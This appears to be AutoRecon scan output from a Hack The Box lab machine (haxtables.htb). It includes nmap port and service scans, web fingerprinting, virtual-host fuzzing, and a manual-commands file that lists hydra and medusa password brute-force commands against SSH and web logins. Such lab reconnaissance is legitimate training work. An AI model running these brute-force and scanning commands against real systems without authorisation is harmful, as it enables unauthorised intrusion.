Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 28 20:10:06 2023 -- 1 IP address (1 host up) scanned in 160.94 seconds
```

13
HTB/encoding/results/report/report.md/10.129.123.2/Services/Service - tcp-80-http/Virtual Host Enumeration.md Normal file
View File

@@ -0,0 +1,13 @@
```bash
curl -sk -o /dev/null -H "Host: JqivbBibaLLbuUZdVXDy.haxtables.htb" http://haxtables.htb:80/ -w "%{size_download}"
``````bash
ffuf -u http://haxtables.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.haxtables.htb" -fs 1999 -noninteractive -s | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_haxtables.htb_vhosts_subdomains-top1million-110000.txt"
```
[/home/kali/htb/results/scans/tcp80/tcp_80_http_haxtables.htb_vhosts_subdomains-top1million-110000.txt](file:///home/kali/htb/results/scans/tcp80/tcp_80_http_haxtables.htb_vhosts_subdomains-top1million-110000.txt):
```
api
image
```

80
HTB/encoding/results/report/report.md/10.129.123.2/Services/Service - tcp-80-http/whatweb.md Normal file
View File

@@ -0,0 +1,80 @@
```bash
whatweb --color=never --no-errors -a 3 -v http://10.129.123.2:80 2>&1
```
[/home/kali/htb/results/scans/tcp80/tcp_80_http_whatweb.txt](file:///home/kali/htb/results/scans/tcp80/tcp_80_http_whatweb.txt):
```
WhatWeb report for http://10.129.123.2:80
Status : 200 OK
Title : HaxTables
IP : 10.129.123.2
Country : RESERVED, ZZ
Summary : Apache[2.4.52], Bootstrap[3.4.1], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)], JQuery[3.6.0], Script, X-UA-Compatible[IE=edge]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.52 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ Bootstrap ]
Bootstrap is an open source toolkit for developing with
HTML, CSS, and JS.
Version : 3.4.1
Version : 3.4.1
Website : https://getbootstrap.com/
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.4.52 (Ubuntu) (from server string)
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Version : 3.6.0
Website : http://jquery.com/
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
[ X-UA-Compatible ]
This plugin retrieves the X-UA-Compatible value from the
HTTP header and meta http-equiv tag. - More Info:
http://msdn.microsoft.com/en-us/library/cc817574.aspx
String : IE=edge
HTTP Headers:
HTTP/1.1 200 OK
Date: Sat, 28 Jan 2023 19:07:10 GMT
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 814
Connection: close
Content-Type: text/html; charset=UTF-8
```

3
HTB/encoding/results/report/report.md/10.129.123.2/Services/Service - tcp-80-http/wkhtmltoimage.md Normal file
View File

@@ -0,0 +1,3 @@
```bash
wkhtmltoimage --format png http://10.129.123.2:80/ /home/kali/htb/results/scans/tcp80/tcp_80_http_screenshot.png
```

78
HTB/encoding/results/scans/_commands.log Normal file
View File

@@ -0,0 +1,78 @@
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_full_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_full_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.129.123.2
feroxbuster -u http://10.129.123.2:80/ -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -q -e -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt"
curl -sSikf http://10.129.123.2:80/.well-known/security.txt
curl -sSikf http://10.129.123.2:80/robots.txt
curl -sSik http://10.129.123.2:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/results/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.123.2
curl -sk -o /dev/null -H "Host: IwDcITnyfroNmHvjuTwI.encoding.htb" http://encoding.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://10.129.123.2:80 2>&1
wkhtmltoimage --format png http://10.129.123.2:80/ /home/kali/htb/results/scans/tcp80/tcp_80_http_screenshot.png
ffuf -u http://encoding.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.encoding.htb" -fs 1999 -noninteractive -s | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_encoding.htb_vhosts_subdomains-top1million-110000.txt"
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_full_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.129.123.2
feroxbuster -u http://10.129.123.2:80/ -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -q -e -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt"
curl -sSikf http://10.129.123.2:80/.well-known/security.txt
curl -sSikf http://10.129.123.2:80/robots.txt
curl -sSik http://10.129.123.2:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/results/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.123.2
curl -sk -o /dev/null -H "Host: CaVSHfCVQYqVqvUahOxO.haxtables.htb" http://haxtables.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://10.129.123.2:80 2>&1
wkhtmltoimage --format png http://10.129.123.2:80/ /home/kali/htb/results/scans/tcp80/tcp_80_http_screenshot.png
ffuf -u http://haxtables.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.haxtables.htb" -fs 1999 -noninteractive -s | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_haxtables.htb_vhosts_subdomains-top1million-110000.txt"
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_full_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/kali/htb/results/scans/_top_100_udp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_top_100_udp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.129.123.2
feroxbuster -u http://10.129.123.2:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
curl -sSikf http://10.129.123.2:80/.well-known/security.txt
curl -sSikf http://10.129.123.2:80/robots.txt
curl -sSik http://10.129.123.2:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/results/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.123.2
curl -sk -o /dev/null -H "Host: JqivbBibaLLbuUZdVXDy.haxtables.htb" http://haxtables.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://10.129.123.2:80 2>&1
wkhtmltoimage --format png http://10.129.123.2:80/ /home/kali/htb/results/scans/tcp80/tcp_80_http_screenshot.png
ffuf -u http://haxtables.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.haxtables.htb" -fs 1999 -noninteractive -s | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_haxtables.htb_vhosts_subdomains-top1million-110000.txt"

57
HTB/encoding/results/scans/_full_tcp_nmap.txt Normal file
View File

@@ -0,0 +1,57 @@
# Nmap 7.93 scan initiated Sat Jan 28 20:06:56 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/htb/results/scans/_full_tcp_nmap.txt -oX /home/kali/htb/results/scans/xml/_full_tcp_nmap.xml 10.129.123.2
adjust_timeouts2: packet supposedly had rtt of -498094 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -498094 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -201839 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -201839 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1007316 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1007316 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -586644 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -586644 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -437252 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -437252 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -233933 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -233933 microseconds. Ignoring time.
Nmap scan report for encoding.htb (10.129.123.2)
Host is up, received user-set (0.026s latency).
Scanned at 2023-01-28 20:06:56 CET for 71s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=
| 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))
|_http-title: HaxTables
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
Aggressive OS guesses: Linux 5.0 (95%), Linux 5.0 - 5.4 (95%), Linux 5.4 (94%), HP P2000 G3 NAS device (93%), Linux 4.15 - 5.6 (93%), Linux 5.3 - 5.4 (93%), Linux 2.6.32 (92%), Infomir MAG-250 set-top box (92%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (92%), Linux 3.7 (92%)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=1/28%OT=22%CT=1%CU=36902%PV=Y%DS=2%DC=T%G=Y%TM=63D5729
OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(SP=106%GCD=1%ISR=10C%TI=Z%CI=Z%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O
OS:3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=FE88%W2=
OS:FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)U1(R=N)IE(R=Y%DFI=N
OS:%T=40%CD=S)
Uptime guess: 46.015 days (since Tue Dec 13 19:46:08 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1025/tcp)
HOP RTT ADDRESS
1 25.62 ms 10.10.14.1
2 26.90 ms encoding.htb (10.129.123.2)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 28 20:08:07 2023 -- 1 IP address (1 host up) scanned in 71.78 seconds

96
HTB/encoding/results/scans/_manual_commands.txt Normal file
View File

@@ -0,0 +1,96 @@
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://10.129.123.2
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h 10.129.123.2
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.129.123.2:80 -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -e -o /home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.123.2/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/results/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.123.2 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.123.2/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/results/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.123.2 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.129.123.2:80 2>&1 | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.129.123.2:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_wpscan.txt"
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://10.129.123.2
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h 10.129.123.2
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.129.123.2:80 -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -e -o /home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.123.2/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/results/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.123.2 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.123.2/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/results/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.123.2 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.129.123.2:80 2>&1 | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.129.123.2:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_wpscan.txt"
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://10.129.123.2
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h 10.129.123.2
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.129.123.2:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.123.2/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/results/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.123.2 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.123.2/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/results/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.123.2 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.129.123.2:80 2>&1 | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.129.123.2:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_wpscan.txt"

2
HTB/encoding/results/scans/_patterns.log Normal file
View File

@@ -0,0 +1,2 @@
Identified HTTP Server: Apache/2.4.52 (Ubuntu)

58
HTB/encoding/results/scans/_quick_tcp_nmap.txt Normal file
View File

@@ -0,0 +1,58 @@
# Nmap 7.93 scan initiated Sat Jan 28 20:06:56 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/htb/results/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml 10.129.123.2
adjust_timeouts2: packet supposedly had rtt of -660845 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -660845 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -666152 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -666152 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -583847 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -583847 microseconds. Ignoring time.
Nmap scan report for encoding.htb (10.129.123.2)
Host is up, received user-set (0.028s latency).
Scanned at 2023-01-28 20:06:56 CET for 29s
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=
| 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))
|_http-title: HaxTables
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 5.0 (89%), Linux 5.4 (89%), Linux 5.0 - 5.4 (88%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (88%), Linux 3.1 (88%), Linux 3.2 (88%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (87%), OpenWrt White Russian 0.9 (Linux 2.4.30) (87%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=1/28%OT=22%CT=1%CU=%PV=Y%DS=2%DC=T%G=N%TM=63D5726D%P=x86_64-pc-linux-gnu)
SEQ(SP=FF%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=B)
SEQ(SP=FF%GCD=1%ISR=10D%TI=Z%II=I%TS=A)
OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)
WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T6(R=N)
T7(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 46.015 days (since Tue Dec 13 19:46:08 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 25.03 ms 10.10.14.1
2 26.51 ms encoding.htb (10.129.123.2)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 28 20:07:25 2023 -- 1 IP address (1 host up) scanned in 29.16 seconds

52
HTB/encoding/results/scans/_top_100_udp_nmap.txt Normal file
View File

@@ -0,0 +1,52 @@
# Nmap 7.93 scan initiated Sat Jan 28 20:06:56 2023 as: nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN /home/kali/htb/results/scans/_top_100_udp_nmap.txt -oX /home/kali/htb/results/scans/xml/_top_100_udp_nmap.xml 10.129.123.2
Warning: 10.129.123.2 giving up on port because retransmission cap hit (6).
Increasing send delay for 10.129.123.2 from 100 to 200 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for 10.129.123.2 from 200 to 400 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for 10.129.123.2 from 400 to 800 due to 11 out of 11 dropped probes since last increase.
adjust_timeouts2: packet supposedly had rtt of -184576 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -184576 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -303015 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -303015 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -527666 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -527666 microseconds. Ignoring time.
Nmap scan report for encoding.htb (10.129.123.2)
Host is up, received user-set (0.026s latency).
Scanned at 2023-01-28 20:06:56 CET for 244s
Not shown: 84 closed udp ports (port-unreach)
PORT STATE SERVICE REASON VERSION
68/udp open|filtered dhcpc no-response
80/udp open|filtered http no-response
111/udp open|filtered rpcbind no-response
120/udp open|filtered cfdptkt no-response
135/udp open|filtered msrpc no-response
